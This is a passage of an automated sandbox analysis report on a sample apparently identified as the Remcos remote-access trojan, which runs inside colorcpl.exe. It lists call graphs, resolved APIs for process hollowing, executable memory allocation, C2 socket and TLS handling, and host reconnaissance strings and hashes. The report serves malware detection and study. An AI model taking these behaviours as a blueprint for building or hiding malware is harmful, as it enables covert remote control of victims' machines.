93962->93966 93964->93927 93968 4a84983 93965->93968 93980 4a84953 93966->93980 93967 4a849ac 93969 4a849d9 CreateEventW CreateEventW 93967->93969 93971 4a82073 28 API calls 93967->93971 93970 4a82073 28 API calls 93968->93970 93969->93927 93972 4a84992 93970->93972 93975 4a849c2 93971->93975 93973 4a994da 77 API calls 93972->93973 93976 4a84997 93973->93976 93977 4a82073 28 API calls 93975->93977 94028 4a9ee67 51 API calls 93976->94028 93979 4a849d1 93977->93979 93981 4a994da 77 API calls 93979->93981 94020 4a9ea55 93980->94020 93982 4a849d6 93981->93982 93982->93969 93984 4a84e20 SetEvent CloseHandle 93983->93984 93985 4a84e37 closesocket 93983->93985 93986 4a84eb8 93984->93986 93987 4a84e44 93985->93987 93986->93479 93988 4a84e5a 
93987->93988 93989 4a84e53 93987->93989 93991 4a84e6c WaitForSingleObject 93988->93991 93992 4a84eae SetEvent CloseHandle 93988->93992 94033 4a850c4 81 API calls 93989->94033 93993 4a9ea55 3 API calls 93991->93993 93992->93986 93994 4a84e7b SetEvent WaitForSingleObject 93993->93994 93995 4a9ea55 3 API calls 93994->93995 93996 4a84e93 SetEvent CloseHandle CloseHandle 93995->93996 93996->93992 93997->93479 93998->93479 93999->93479 94000->93479 94001->93479 94002->93479 94003->93502 94004->93502 94005->93502 94006->93502 94007->93502 94008->93502 94009->93502 94010->93502 94011->93502 94012->93900 94013->93907 94014->93915 94018 4a8513c 99 API calls 94015->94018 94017 4a85139 94018->94017 94019->93936 94021 4a9ea5d 94020->94021 94022 4a9c4c6 94020->94022 94021->93927 94023 4a9c4d4 94022->94023 94031 4a9b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94022->94031 94032 4a9c1f6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94023->94032 94026 4a9c4db 94027->93957 94028->93980 94029->93967 94030->93939 94031->94023 94032->94026 94033->93988 94035->93529 94036->93557 94037->93556 94038->93545 94039->93549 94040->93555 94043 4a8e1a8 94041->94043 94042 4a91f34 3 API calls 94042->94043 94043->94042 94044 4a8e1da 94043->94044 94045 4a8e24e 94043->94045 94047 4a8e23e Sleep 94043->94047 94044->94047 94056 4a81ee9 11 API calls 94044->94056 94060 4a82073 28 API calls 94044->94060 94063 4a9215f 14 API calls 94044->94063 94074 4a8bc59 110 API calls ___scrt_get_show_window_mode 94044->94074 94075 4a88098 28 API calls 94044->94075 94076 4a99bca 28 API calls 94044->94076 94077 4a92204 14 API calls 94044->94077 94078 4a88098 28 API calls 94045->94078 94047->94043 94051 4a8e25b 94079 4a99bca 28 API calls 94051->94079 94053 4a8e267 94080 4a92204 14 API calls 94053->94080 94056->94044 94057 4a8e27a 94058 4a81ee9 11 API calls 94057->94058 94059 4a8e286 94058->94059 94061 4a82073 28 API calls 94059->94061 94060->94044 94062 4a8e297 94061->94062 94064 
4a9215f 14 API calls 94062->94064 94063->94044 94065 4a8e2aa 94064->94065 94081 4a912b5 TerminateProcess WaitForSingleObject 94065->94081 94067 4a8e2b2 ExitProcess 94082 4a91253 61 API calls 94073->94082 94075->94044 94076->94044 94077->94044 94078->94051 94079->94053 94080->94057 94081->94067 94083 4aad6a2 94084 4aad6ad 94083->94084 94085 4aad6c1 94084->94085 94087 4ab0ca3 94084->94087 94088 4ab0cae 94087->94088 94089 4ab0cb2 94087->94089 94088->94085 94091 4abb6c1 94089->94091 94092 4ac3697 94091->94092 94093 4ac36af 94092->94093 94094 4ac36a4 94092->94094 94096 4ac36b7 94093->94096 94102 4ac36c0 __Getctype 94093->94102 94104 4ac3649 94094->94104 94111 4ac3c92 20 API calls _free 94096->94111 94098 4ac36ea HeapReAlloc 94101 4ac36ac 94098->94101 94098->94102 94099 4ac36c5 94112 4abad91 20 API calls __dosmaperr 94099->94112 94101->94088 94102->94098 94102->94099 94113 4ac0480 7 API calls 2 library calls 94102->94113 94105 4ac3687 94104->94105 94109 4ac3657 __Getctype 94104->94109 94115 4abad91 20 API calls __dosmaperr 94105->94115 94106 4ac3672 RtlAllocateHeap 94108 4ac3685 94106->94108 94106->94109 94108->94101 94109->94105 94109->94106 94114 4ac0480 7 API calls 2 library calls 94109->94114 94111->94101 94112->94101 94113->94102 94114->94109 94115->94108 94116 4aa4a00 94121 4aa4a7d send 94116->94121 94122 4aa4991 94128 4aa4a66 recv 94122->94128 94129 4a9bd72 94130 4a9bd87 _Yarn ___scrt_get_show_window_mode 94129->94130 94131 4a9bf8a 94130->94131 94148 4ab0c79 21 API calls _Yarn 94130->94148 94137 4a9bf3e 94131->94137 94143 4a9b917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 94131->94143 94134 4a9bf9b 94134->94137 94144 4ab0c79 21 API calls _Yarn 94134->94144 94136 4a9bf37 ___scrt_get_show_window_mode 94136->94137 94149 4ab0c79 21 API calls _Yarn 94136->94149 94139 4a9bfd4 ___scrt_get_show_window_mode 94139->94137 94145 4ab12ff 94139->94145 94141 4a9bf64 ___scrt_get_show_window_mode 94141->94137 94150 4ab0c79 21 API 
calls _Yarn 94141->94150 94143->94134 94144->94139 94151 4ab121e 94145->94151 94147 4ab1307 94147->94137 94148->94136 94149->94141 94150->94131 94152 4ab1237 94151->94152 94156 4ab122d 94151->94156 94152->94156 94157 4ab0c79 21 API calls _Yarn 94152->94157 94154 4ab1258 94154->94156 94158 4ab15ec CryptAcquireContextA 94154->94158 94156->94147 94157->94154 94159 4ab1608 94158->94159 94160 4ab160d CryptGenRandom 94158->94160 94159->94156 94160->94159 94161 4ab1622 CryptReleaseContext 94160->94161 94161->94159

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 04A91F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04A91F54
                                          • Part of subcall function 04A91F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,04AF2200), ref: 04A91F72
                                          • Part of subcall function 04A91F34: RegCloseKey.KERNEL32(?), ref: 04A91F7D
                                        • Sleep.KERNEL32(00000BB8), ref: 04A8E243
                                        • ExitProcess.KERNEL32 ref: 04A8E2B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                        • String ID: 3.8.0 Pro$override$pth_unenc
                                        • API String ID: 2281282204-3177840460
                                        • Opcode ID: 74b911757481e017683ddcfef21c541a7d2134e28fa03d4700656ad8bc4471f6
                                        • Instruction ID: 91b3df9108f4b7dc1ba5cbe047ff625fc3f700b18bdad1bf401bb4129ffd126b
                                        • Opcode Fuzzy Hash: 74b911757481e017683ddcfef21c541a7d2134e28fa03d4700656ad8bc4471f6
                                        • Instruction Fuzzy Hash: 1221E571B503007BFE08B7B98E16B7F35D9EB95608F40044CE5119B2C5EE66BE068392

                                        Control-flow Graph

                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 068D12A1
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 068D12B1
                                        • LoadLibraryA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 068D13F8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 2441068224-0
                                        • Opcode ID: bd8075dc6991ca337bed542f03690e9814ab4de7dc4771d535a4c61e653253e1
                                        • Instruction ID: bb458d503548e705aec7de273ca164341b5fa57b252bfe1fea26c6958e619fbb
                                        • Opcode Fuzzy Hash: bd8075dc6991ca337bed542f03690e9814ab4de7dc4771d535a4c61e653253e1
                                        • Instruction Fuzzy Hash: 09D1AE71E00215AFDB64CFA8CC88BAEB7B6FF44714F188169E945EB645D774E900CBA0

                                        Control-flow Graph

                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,04AB1274,00000034,?,?,02B045E0), ref: 04AB15FE
                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,04AB1307,00000000,?,00000000), ref: 04AB1614
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,04AB1307,00000000,?,00000000,04A9C006), ref: 04AB1626
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 4d367a567dd1881b1fb81310cc45897193d22ec98fa2da3d85bef428bb48f6c0
                                        • Instruction ID: 9efd2c192e5655960b3920f5d39462ef55612d779ab4e454640b7bbbbfcc9fde
                                        • Opcode Fuzzy Hash: 4d367a567dd1881b1fb81310cc45897193d22ec98fa2da3d85bef428bb48f6c0
                                        • Instruction Fuzzy Hash: 66E09231308210BAFB300F11AC28F962A69EB857A1F244628F193E40D4D6555C018698
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,00000010), ref: 04A9962D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: 01451ab717d19f7cbe0fead9fb86ab822bf256cb4a4831c62721c1d60552aa0e
                                        • Instruction ID: 4644ac6dffc53bed0267beecf21ab390c20f77c6bbea419115c8dc71bd787cf8
                                        • Opcode Fuzzy Hash: 01451ab717d19f7cbe0fead9fb86ab822bf256cb4a4831c62721c1d60552aa0e
                                        • Instruction Fuzzy Hash: 3C01FF7290011DABDB04FBD4DD45EEEB7BCEF44314F10015AA505A6194EE746E89CB94
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: cb47d038f13f7b22b008e41a6301f959c1324b032558071d1b86d40276ae304a
                                        • Instruction ID: 07cef0e031c5075556892c58ad7e4a67e14cd63a850dfa11dc297795937ee374
                                        • Opcode Fuzzy Hash: cb47d038f13f7b22b008e41a6301f959c1324b032558071d1b86d40276ae304a
                                        • Instruction Fuzzy Hash: A9B092FA21A202BF8A061B60C9048BA7EBAEBC8380B00881CB14740120D6368850AB21

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A8EF
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A8F8
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A90F
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A912
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A924
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A927
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A93D
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A940
                                        • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,04A8D40C), ref: 04A9A951
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A954
                                        • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,04A8D40C), ref: 04A9A969
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A96C
                                        • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,04A8D40C), ref: 04A9A97D
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A980
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,04A8D40C), ref: 04A9A98C
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A98F
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,04A8D40C), ref: 04A9A9A1
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9A4
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,04A8D40C), ref: 04A9A9B1
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9B4
                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,04A8D40C), ref: 04A9A9C5
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9C8
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,04A8D40C), ref: 04A9A9D5
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9D8
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,04A8D40C), ref: 04A9A9EA
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9ED
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,04A8D40C), ref: 04A9A9FA
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9FD
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,04A8D40C), ref: 04A9AA0A
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA0D
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,04A8D40C), ref: 04A9AA1F
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA22
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,04A8D40C), ref: 04A9AA30
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA33
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,04A8D40C), ref: 04A9AA40
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                        • API String ID: 551388010-2474455403
                                        • Opcode ID: 79b92b12623695bb2207a99245ddde3d7fafe257bee5c2bb120a46ddd8993651
                                        • Instruction ID: 4c1b56edf44a5e4caba94b945334ffa9ce89632e0ef126e58060a22ba736899b
                                        • Opcode Fuzzy Hash: 79b92b12623695bb2207a99245ddde3d7fafe257bee5c2bb120a46ddd8993651
                                        • Instruction Fuzzy Hash: 4631F8F0E4035CBBDA10BBF76C49D7B3E9CFA506947810616B625D3610EAB9BC028E64

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A8EF
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A8F8
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A90F
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A912
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A924
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A927
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A93D
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A940
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,04A8D40C), ref: 04A9A951
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A954
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,04A8D40C), ref: 04A9A969
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A96C
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,04A8D40C), ref: 04A9A97D
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A980
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,04A8D40C), ref: 04A9A98C
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A98F
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,04A8D40C), ref: 04A9A9A1
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9A4
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,04A8D40C), ref: 04A9A9B1
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9B4
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,04A8D40C), ref: 04A9A9C5
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9C8
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,04A8D40C), ref: 04A9A9D5
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9D8
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,04A8D40C), ref: 04A9A9EA
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9ED
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,04A8D40C), ref: 04A9A9FA
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9FD
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04A8D603
                                          • Part of subcall function 04A8F98D: __EH_prolog.LIBCMT ref: 04A8F992
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                        • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$exepath$licence$license_code.txt$origmsc
                                        • API String ID: 1529173511-3534803471
                                        • Opcode ID: bd877cf4044d4c85041fb9b3d4ccb04f963089c93171ae573c3db7c4e7702993
                                        • Instruction ID: f1e2699ef69e853d9ba7378ca7677acfc468db392665c2d8b1586f89bf8f732d
                                        • Opcode Fuzzy Hash: bd877cf4044d4c85041fb9b3d4ccb04f963089c93171ae573c3db7c4e7702993
                                        • Instruction Fuzzy Hash: A422E571B443446FFE197BB45E65B7E2699DF81608F00086EF6429F2C1EE69BD0383A1

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNEL32(00000000,00000029,76230F10,04AF1FFC,00000000), ref: 04A939D1
                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 04A93BE2
                                        • Sleep.KERNEL32(00000000,00000002), ref: 04A944C7
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ErrorLastLocalTime
                                        • String ID: | $%I64u$3.8.0 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                        • API String ID: 524882891-3810641973
                                        • Opcode ID: fa9d7d385c071e45082136694c35450eb419c5fc1a594e36677d49e4647fcc4c
                                        • Instruction ID: ab7b5af1d0c6f4e9e74eefbd49cd0b010279e123e4a213a83edaa9abb9e8f7a5
                                        • Opcode Fuzzy Hash: fa9d7d385c071e45082136694c35450eb419c5fc1a594e36677d49e4647fcc4c
                                        • Instruction Fuzzy Hash: F3425C72A001145BFB18F764EE91AFEB3B9EF94208F5041EEE40A661D1EF307E46CA55

                                        Control-flow Graph

                                        APIs
                                        • connect.WS2_32(?,?,?), ref: 04A848C0
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04A849E0
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04A849EE
                                        • WSAGetLastError.WS2_32 ref: 04A84A01
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                        • API String ID: 994465650-2151626615
                                        • Opcode ID: 5a1fa55338a7c12ac80322ddef1279b07c572f3852051929ee2b0ef7b0f0e71a
                                        • Instruction ID: be221d0f1193b248af734c9e61e3e7b88141f8687091888c07ee22aa51252f7b
                                        • Opcode Fuzzy Hash: 5a1fa55338a7c12ac80322ddef1279b07c572f3852051929ee2b0ef7b0f0e71a
                                        • Instruction Fuzzy Hash: 7341EB76B402067BFF14BB798A5693DBBA9FB55208B80418DD81147681FF12BC21C7D7

                                        Control-flow Graph

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,04AF1E90,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E18
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E23
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E2C
                                        • closesocket.WS2_32(?), ref: 04A84E3A
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E71
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E82
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E89
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E9A
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E9F
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84EA4
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84EB1
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84EB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                        • String ID:
                                        • API String ID: 3658366068-0
                                        • Opcode ID: e00e5fbd5d9ba3198436ded260d8c3b7ebe791fd781c85c3e136070ec347788f
                                        • Instruction ID: 23afa721f593ca7912d2544d38beca2b5ef696dcaaf80abca0ab65e365f1a1ca
                                        • Opcode Fuzzy Hash: e00e5fbd5d9ba3198436ded260d8c3b7ebe791fd781c85c3e136070ec347788f
                                        • Instruction Fuzzy Hash: 16210431501B01AFDB21AF25DD49B1ABBE6FF40326F104A1CE1A316AF0DB66B851DB54

                                        Control-flow Graph

                                        APIs
                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 04A8C753
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LongNamePath
                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 82841172-425784914
                                        • Opcode ID: 04af934db21cbca7ef1622e942bfb253bc62f8323bf2ebf724f3ba15072259eb
                                        • Instruction ID: c3009b2950dcdad9568042ab17f443f563cf49b5cc058a79a58867e8de45014a
                                        • Opcode Fuzzy Hash: 04af934db21cbca7ef1622e942bfb253bc62f8323bf2ebf724f3ba15072259eb
                                        • Instruction Fuzzy Hash: 57415171108301ABE604FB61DE51CFFB7E8EFA5618F10092EF556560A1FF60BD0ACA62

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 04A99F23: GetCurrentProcess.KERNEL32(?,?,?,04A8C663,WinDir,00000000,00000000), ref: 04A99F34
                                          • Part of subcall function 04A91F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 04A91FB5
                                          • Part of subcall function 04A91F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04A91FD2
                                          • Part of subcall function 04A91F91: RegCloseKey.KERNEL32(?), ref: 04A91FDD
                                        • StrToIntA.SHLWAPI(00000000,04AE9710,00000000,00000000,00000000,04AF1FFC,00000001,?,?,?,?,?,?,04A8D6A0), ref: 04A99327
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCurrentOpenProcessQueryValue
                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 1866151309-2070987746
                                        • Opcode ID: 3c466bdbb75bfc8d74b65f411c8b2f36fa716a34423676951d01e4beddbdd3e1
                                        • Instruction ID: 4736e5a5006696d60c364dcdc76444eb075a224a722d2f459778302bc2f65824
                                        • Opcode Fuzzy Hash: 3c466bdbb75bfc8d74b65f411c8b2f36fa716a34423676951d01e4beddbdd3e1
                                        • Instruction Fuzzy Hash: E811E3F1A002047BFB00BB659C9AABFB7EDDB90114F44062DE906572D1FB657C4787A1

                                        Control-flow Graph

                                        APIs
